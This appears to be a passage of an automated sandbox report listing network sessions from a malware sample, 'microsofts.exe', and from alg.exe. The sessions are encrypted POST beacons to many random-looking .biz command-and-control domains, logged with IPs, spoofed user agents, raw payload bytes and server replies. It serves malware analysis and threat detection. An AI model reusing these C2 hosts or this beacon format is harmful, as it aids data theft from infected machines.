                                                                                                                                                                                                                                                                                                          125192.168.2.55161585.214.228.14080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.466159105 CEST359OUTPOST /ymrgibjtpgrltdn HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.466180086 CEST828OUTData Raw: de 7a f1 9a a5 e4 b4 89 30 03 00 00 ca 67 07 83 ca 25 a1 3b 3f 0b ba cd c9 be b1 76 fa b6 a3 d9 38 6a 6d fb 12 a4 65 88 f8 d1 9d 4e a2 62 12 d9 a4 fe 75 11 57 4a 71 ba ce f5 4c 92 35 85 25 66 15 40 b1 41 04 fd 40 18 d2 35 d8 88 35 8e 88 d8 fa 3c
                                                                                                                                                                                                                                                                                                          Data Ascii: z0g%;?v8jmeNbuWJqL5%f@A@55<6pw#Kc^jK[<"I}$}&z,\J*u2:?Up`ornQPVwNDcN/#MM|+k}B2ipc0Rwz#


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          126192.168.2.55161747.129.31.21280576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.530905962 CEST352OUTPOST /entqbvydd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.530982018 CEST828OUTData Raw: 18 5e 1e d3 c4 ee ea 3a 30 03 00 00 39 5e a9 1f 7c 79 d0 05 ea 4f fc aa 9b 1c 24 44 a8 53 5e f1 0e 8f 49 db f6 3e c1 d7 31 c1 49 cc e7 e6 e1 d0 be 32 24 6e 8d 30 b4 d3 dd fd 65 f3 eb c0 c5 44 a3 33 c9 31 ed a7 ed 7a cb cb 2f 7e 9e 9e 1c ca 20 88
                                                                                                                                                                                                                                                                                                          Data Ascii: ^:09^|yO$DS^I>1I2$n0eD31z/~ @:%:Vmy^_fqY%xp9H(53*+]06doy\$LJc}Fq56Fr15h4F^D#^Xy(-fo`.]m>T?Qy%


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          127192.168.2.55161834.211.97.4580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.558228016 CEST345OUTPOST /rhvd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.558346033 CEST828OUTData Raw: 83 a0 99 30 98 c6 3f 37 30 03 00 00 fc e4 7a 33 19 7a 64 46 30 46 26 42 c5 50 0b 56 73 6c 63 31 84 af b7 2b 79 e6 00 11 b6 d1 54 c4 3e 3d aa b1 69 d8 8d 6d 56 1f 76 ae 48 8b 13 7c 2c 37 32 02 ee 9b 9d 58 af 25 51 f6 4a ae bc ed a4 1d 48 51 b0 d2
                                                                                                                                                                                                                                                                                                          Data Ascii: 0?70z3zdF0F&BPVslc1+yT>=imVvH|,72X%QJHQ(Hpe<otQ,7!}TSK'eZ2wzNa+0yLBeBuq{sZ7+c&1nP~+&\g-/z
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.279443026 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:13 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=66ed27e3a6a78e0da352f1cb6c30b9a2|8.46.123.33|1728547753|1728547753|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                          128192.168.2.55161934.211.97.4580
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.721726894 CEST358OUTPOST /csepohryabqocrsd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.721760988 CEST778OUTData Raw: fd 21 97 c2 0e 71 65 60 fe 02 00 00 b7 75 05 96 1e 67 04 a2 48 c3 54 07 ae eb 02 64 c3 5a 12 e0 98 d8 7e 8e 7f 11 93 0f 30 4c 74 80 63 a3 8e b0 5d f6 22 93 aa be 32 48 a5 00 cc 40 cb 3e 58 58 54 39 d6 c4 8b 47 54 d4 06 aa ec 69 d7 5e 96 43 44 28
                                                                                                                                                                                                                                                                                                          Data Ascii: !qe`ugHTdZ~0Ltc]"2H@>XXT9GTi^CD(}yiYA{Vw2URilyEzp%'_D+BF,9K!6GL|\='mrTK0S-K#awB]5'M9]`9S]]\8
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.460072041 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:13 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=7fbf5af0e41356def2ae2550b3ab6eea|8.46.123.33|1728547753|1728547753|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          129192.168.2.55162047.129.31.21280576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.302999973 CEST354OUTPOST /eeswgjxjcwha HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.303042889 CEST828OUTData Raw: ab dc fa 3c 96 5a 07 c9 30 03 00 00 2d 16 63 ac bb bd 8e a6 3b 0d ec 65 e2 bb d5 e3 45 19 ca 3a af 2e f8 85 64 3b e1 c5 df 82 9b ad 15 1f 3a c0 0b 09 e6 c9 e4 08 81 63 20 54 ea 7e 2b e7 79 57 fa f2 61 3f 05 5b 54 cd 62 24 0a 68 3e 3c df 65 b8 53
                                                                                                                                                                                                                                                                                                          Data Ascii: <Z0-c;eE:.d;:c T~+yWa?[Tb$h><eS8Rh]_38B:(6~Vz%mKF(]0KcjZVe'[MaEIXQ.?~c44[x71Q B`dVqej{


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          130192.168.2.55162147.129.31.21280576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.317625999 CEST350OUTPOST /ewnwyxek HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.317689896 CEST828OUTData Raw: b7 20 6a f2 56 a4 00 0a 30 03 00 00 46 38 2e 2e 04 f6 30 21 c8 fd 75 1c 6a 16 f6 37 d0 fe e8 23 b4 ef b3 d4 ed 7e 18 59 56 89 51 34 e8 f1 fd ce 98 eb 2e 8a fd c9 3f ba c1 ab d9 ed 5a 5b 33 1c 4a 57 0d dd d1 83 36 ad 09 0b 75 77 11 10 e2 c6 b0 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: jV0F8..0!uj7#~YVQ4.?Z[3JW6uwvs(&rPoW(b=vSGqh.-pqe(:2oa\N<g7k%t2]cPPO.EH+M:!t6c!~-RYe>$4KLh?;Yv_


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          131192.168.2.55162218.208.156.24880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.474539042 CEST358OUTPOST /butjufvvmucwu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.474562883 CEST828OUTData Raw: 1c 6d ba 41 d2 61 df 12 30 03 00 00 af 90 9c eb f3 e1 d9 63 77 fe da bf ff 25 9a 64 4c 25 21 57 1f f1 fc f7 74 68 11 6c 77 83 ee b4 51 c3 9b 9e 09 d6 61 ae 32 30 9b 63 83 56 4a 43 2a ab 6b ad 1c bf c9 f9 63 2e b1 05 c4 b8 22 a0 42 21 58 a0 73 13
                                                                                                                                                                                                                                                                                                          Data Ascii: mAa0cw%dL%!WthlwQa20cVJC*kc."B!Xs*Y`QDDO1ZiY0P|B`=1H 0hs2%]/!B!'XM`RO%B?l([oWh!1+4~f~~}
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.943063021 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:13 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b0a39717d9ca9752faf5d884f2f0c543|8.46.123.33|1728547753|1728547753|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          132192.168.2.55162318.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.845283985 CEST350OUTPOST /abotv HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.845283985 CEST778OUTData Raw: 6e f7 1a a8 8d e3 c2 ae fe 02 00 00 87 23 a4 ab f1 5e 5c 01 f0 df 93 a5 47 c0 13 7b ff 98 9a 15 1e a3 f0 1f 41 42 ff c4 05 52 19 09 a7 b2 bc c6 af 5c d6 16 66 ce 57 62 fb 2f a6 b5 09 43 9e 54 aa 60 c3 fe 97 8b 84 55 7a 45 b7 50 17 bd e6 51 b2 65
                                                                                                                                                                                                                                                                                                          Data Ascii: n#^\G{ABR\fWb/CT`UzEPQe(0 52;irK7AQ<.5"b+RmOwhfX=t&*7<+dl4`x:CG)N {baAkd0w~yL@~4X
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.303838968 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:14 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=5bdb32055febf62b952fc7c454e6874a|8.46.123.33|1728547754|1728547754|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          133192.168.2.55162413.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.979410887 CEST349OUTPOST /dhvreng HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.979410887 CEST828OUTData Raw: 26 b8 82 50 54 2d 69 0e 30 03 00 00 f6 e7 ca c9 69 37 16 c6 26 47 2b 83 1e 71 b5 02 de 22 b2 a8 8a 19 92 bc 9a 98 26 6d 4c ae 0f a3 65 3c 7e b6 52 ff c2 0f 6d 74 52 08 b5 ed b0 51 cd 7d ab b4 24 04 98 71 56 66 a6 fd 89 17 9f 18 c9 fd 83 ec 08 46
                                                                                                                                                                                                                                                                                                          Data Ascii: &PT-i0i7&G+q"&mLe<~RmtRQ}$qVfF#fP[uirD#@s.#Lu*2OaeJdsVFX,*BG/[xi((`Ydc0FqCsuR[*n_T
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.335064888 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:15 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=279831f9956f1aac606bf74dcb949b5b|8.46.123.33|1728547755|1728547755|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          134192.168.2.5516253.254.94.185807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.969250917 CEST353OUTPOST /plbdbgmplm HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.969250917 CEST778OUTData Raw: 7a 3d 60 a3 04 d4 3a 76 fe 02 00 00 4d 1e bb 83 36 0d 6f e8 b6 b2 a7 dc c2 ca b8 57 54 16 f2 d2 c9 ef 6f bf 83 fd d6 c4 9d 41 bd b5 a0 30 b3 7a cc 39 51 ee 0a dd fe 86 5a 89 ab 6e 4c f6 84 0a 0f 4a dd 05 c0 fe 00 09 c4 e1 2a 5c e7 5c 5c 06 31 76
                                                                                                                                                                                                                                                                                                          Data Ascii: z=`:vM6oWToA0z9QZnLJ*\\\1vi+#R/aK'(Iju"$\&dx7 lG>J0Z);X%d9d7'gLlCoWW>[e)v:72(f:RkeztQc
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.727737904 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:15 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=5cff5469e0aadc59f0175a0686294711|8.46.123.33|1728547755|1728547755|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          135192.168.2.55162634.246.200.16080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.359004974 CEST357OUTPOST /cmrwepikmmer HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.359029055 CEST828OUTData Raw: 6a 91 d5 50 b6 f0 2f 1d 30 03 00 00 8d 0c 9c e8 28 15 8e dc 10 fc 8e 4c 48 4e e2 d6 11 0b db ef cc ee 8f 75 69 41 4b 74 a3 77 11 00 18 7f 81 9b 2c 8e 35 c2 5d 03 28 11 77 f0 24 27 fb bc 96 fa a8 c3 f7 ac 42 a1 53 2f 2c ca 74 84 d6 0a 93 a5 e4 b4
                                                                                                                                                                                                                                                                                                          Data Ascii: jP/0(LHNuiAKtw,5](w$'BS/,tH+5 ?HmQLG9P]}fja@~a&+z=p>&TtjtP*hNdBPW40{U`V~%GK6)E%.DQVoP^


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          136192.168.2.55162734.246.200.16080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.370867968 CEST352OUTPOST /pwmmeoh HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.370867968 CEST828OUTData Raw: 26 ca 2b 8e 7f 4e 2d 16 30 03 00 00 ca 2d e1 91 4f da 96 d1 36 cf ee d5 32 e2 5c 59 4d 70 78 97 3a 35 a3 51 d6 99 4c dd 90 9e 6f 38 cd 57 ac 9a 97 8e 07 51 08 c6 9a a9 f4 7d c3 09 30 81 81 6d 9f 15 e8 5e 20 90 f4 72 65 7b 00 50 0b cc d2 86 ad 35
                                                                                                                                                                                                                                                                                                          Data Ascii: &+N-0-O62\YMpx:5QLo8WQ}0m^ re{P5GznD)<dN\a2!bO4^TVvEpFm(:GJ*Y{;UHSE8|rr`S7 v,4lkl!o_pB5:


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          137192.168.2.55162818.141.10.10780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.395207882 CEST357OUTPOST /dvvbbgutuwtwsq HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.395230055 CEST828OUTData Raw: ad 3c fe d7 9e 41 a4 04 30 03 00 00 40 45 f3 48 9f b8 19 b8 a8 da 1c bc f6 62 32 7c d3 0e 74 0e 77 02 71 98 a1 a4 f9 2c 5e f3 23 22 81 97 bf e3 ae 4d 8e 63 59 8b 5c 85 70 6a e8 99 7b ac cd 8c df 93 b9 df ec 57 e1 fe c2 f1 1e 12 0e c6 4e a5 73 be
                                                                                                                                                                                                                                                                                                          Data Ascii: <A0@EHb2|twq,^#"McY\pj{WNs$6zB{"V>n`'28yU}xU>yTIN6oLt;kXd [-1B1pB(MW^e%L @|ht)1d`zZEiH[pX)&5rm)0b&
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.746202946 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:16 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=62571ec4cc758ed5627ef16a8894107f|8.46.123.33|1728547756|1728547756|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
